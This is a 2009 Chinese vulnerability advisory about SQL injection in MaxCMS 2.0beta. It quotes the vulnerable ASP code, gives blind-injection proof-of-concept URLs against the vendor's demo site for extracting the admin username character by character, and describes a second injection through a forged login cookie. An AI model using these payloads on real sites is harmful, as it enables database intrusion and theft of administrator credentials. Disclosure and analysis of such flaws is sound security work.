马克斯CMS2.0beta (maxcms)SQL注入漏洞
作者:flyh4t 来源:wolvez.org 发布时间:2009-02-17 12:58:00
这个系统是国内非常流行的视频点播系统,之前的1.5版本漏洞非常多,2.0版本在安全方面有所提高,但是依然有漏洞存在。
看代码
\inc\ajax.aspdim action : action = getForm("action", "get")response.Charset="gbk"Select case action case "newslist" : viewNewsList case "newscontent" : viewNewsContent case "digg","tread" : scoreVideo(action) case "reporterr" : reportErr case "hit" : updateHit case else : mainEnd SelectterminateAllObjects……Sub scoreVideo(operType) dim sql,id,digg,returnValue : id=getForm("id","get") ‘通过get方式获取id的值 if rCookie("maxcms2_score"&id)="ok" then die "havescore" if isNul(id) then die "err" 'on error resume next digg=conn.db("select m_digg from {pre}data where m_id="&id,"execute")(0) ‘ 参数id,没有过滤就带入sql语句进行查询 if err then digg=0 : err.clear() if not isNum(id) then echoSaveStr "safe" else id=clng(id) ‘ 查询到digg,注意返回的内容……
利用就很简单了,构造sql语句提交(默认结构是m_manager,m_username,m_pwd,根据返回的内容判断就可以了。如果构造的语句是正确的,就返回类似警告
你提交的数据有非法字符,你的IP【xxxx】已被记录,操作
构造的语句不正确,则返回500
Poc :
正确的:http://demo.maxcms.net/inc/ajax.asp?action=digg&id=1%20and%20(select%20top%201%20asc(mid(m_username,1,1))%20from%20m_manager)=97不正确的:http://demo.maxcms.net/inc/ajax.asp?action=digg&id=1%20and%20(select%20top%201%20asc(mid(m_username,1,1))%20from%20m_manager)=99
其实随便找个注射工具跑一下就ok了
另外一处注射
Sub checkPower dim loginValidate,rsObj : loginValidate = "maxcms2.0" err.clear on error resume next set rsObj=conn.db("select m_random,m_level from {pre}manager where m_username='"&rCookie("m_username")&"'","execute") loginValidate = md5(getAgent&getIp&rsObj(0)) if err then wCookie "check"&rCookie("m_username"),"" : die "<script>top.location.href='index.asp?action=login';</script>" if rCookie("check"&rCookie("m_username"))<>loginValidate then wCookie "check"&rCookie("m_username"),"" : die "<script>top.location.href='index.asp?action=login';</script>" checkManagerLevel rsObj(1) set rsObj=nothingEnd Sub
其中
Function rCookie(cookieName) rCookie = request.cookies(cookieName)End Function
通过伪造cookie中m_username的值可以进行注射
不过要知道后台管理目录,默认是/admin/,多个页面可以触发改函数
比如 /admin/admin_ajax.asp


猜你喜欢
- 目前一般现今ASP木马常通过以下四点来操作服务器,所以我们只要将一下四处设置好就能从一定程度上有效防止ASP木马的入侵、使用IIS服务器的站
- Docker 是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的容器中,然后发布到任何流行的 Linux 机器上,
- 网站重建的目的是为了获得更好的表现。因此,第一项要做的事情就是用Seo来思考新网站以什么新形式出现,新的网站在建设过程中,要考虑保持原来网站
- 老马说,你现在混日子,小心将来日子混了你。我们中的很多站长都在混日子,也许,我们仿佛找到了理想,伸出一把手却又没有抓住,一点感觉都没有似的。
- 本报记者 雷中辉 北京报道“我们还没有接到实施细则的通知,具体怎么办还不清楚。”7月22日,北京市工商行政管理局大厅,当记者询问电子商务网店
- 如果采用root账号登录编辑/etc/bashrc内容,那所有其他帐号登录都会提示相同的内容,如果想每个用户进行配置,那就去每个帐号的目录下
- 现在论坛到处可见,有的论坛很强大,几万几十万甚至几百万IP都有,地域性的(如:某个县的论坛)、实用性的(如炒股论坛)、行业性的(如化工行业)
- Nginx ("engine x") 是一个高性能的 HTTP 和反向代理服务器,也是一个 IMAP/POP3/SMTP
- DNS分为Client和Server,Client扮演发问的角色,也就是问 Server 一个Domain Name,而Server必须要回
- 什么样的站点会受到百度欢迎?站点应该是面向用户的,而不是面向搜索引擎的。一个受到用户欢迎的站点,最终也会受到搜索引擎欢迎;反过来,如果您的站
- “我从来没有想到,充满创意的Google竟然要看成绩单!”12月8日中午,上海江苏路一家咖啡厅,说起几个月前在Google美国总部的面试经历
- 如何从博客中扩展我们的外部链接。但需要申明一点的是:思亿欧所说的不是通过大量注册博客增加自己链接的方式。而是,参与到跟自己主题相关的博客中分
- 1. pv 命令有时候我们在电影屏幕上看到一些字幕一个个匀速显示出来,像有人在边敲键盘,边显示一样。Linux上的pv命令可以实现这种效果。
- 反向链接、网站结构优化、关键词布置,并列搜索引擎优化三 * 门,其中,反向链接的获得往往是做SEO的朋友最感头痛的。芋头在这里总结了最实用的七
- 为了能在已经存在iis6的服务器上运行自己的java程序,经过历时半年的尝试,今天终于搞定了,好开心啊。最开始是用iis直接连接tomcat
- eCPM(Effective CPM)是Google Adsense的一个非常重要的参数,根据这个参数,你可以分析出Google AdSen
- 这个问题,是基于现在很多企业宣扬的按效果付费并不是真正的按效果付费的现象而提出。对于某些企业混淆视听,玩弄概念的情况,笔者觉得有必要作出诠释
- 3月3日消息,据国外媒体报道,随着市场份额日渐增大,谷歌又推出了新的Chrome Beta版。新版本Chrome只是针对于Windows用户
- SMO: (Social Media Optimization)社会化媒体优化一个内容丰富的成熟网站,除了利用搜索引擎SEO带来的流量之外,
- 作为Internet上的FTP服务器,系统的安全性是非常重要的,这是建立FTP服务器者所考虑的第一个问题。其安全性主要包括以下几个方面:一、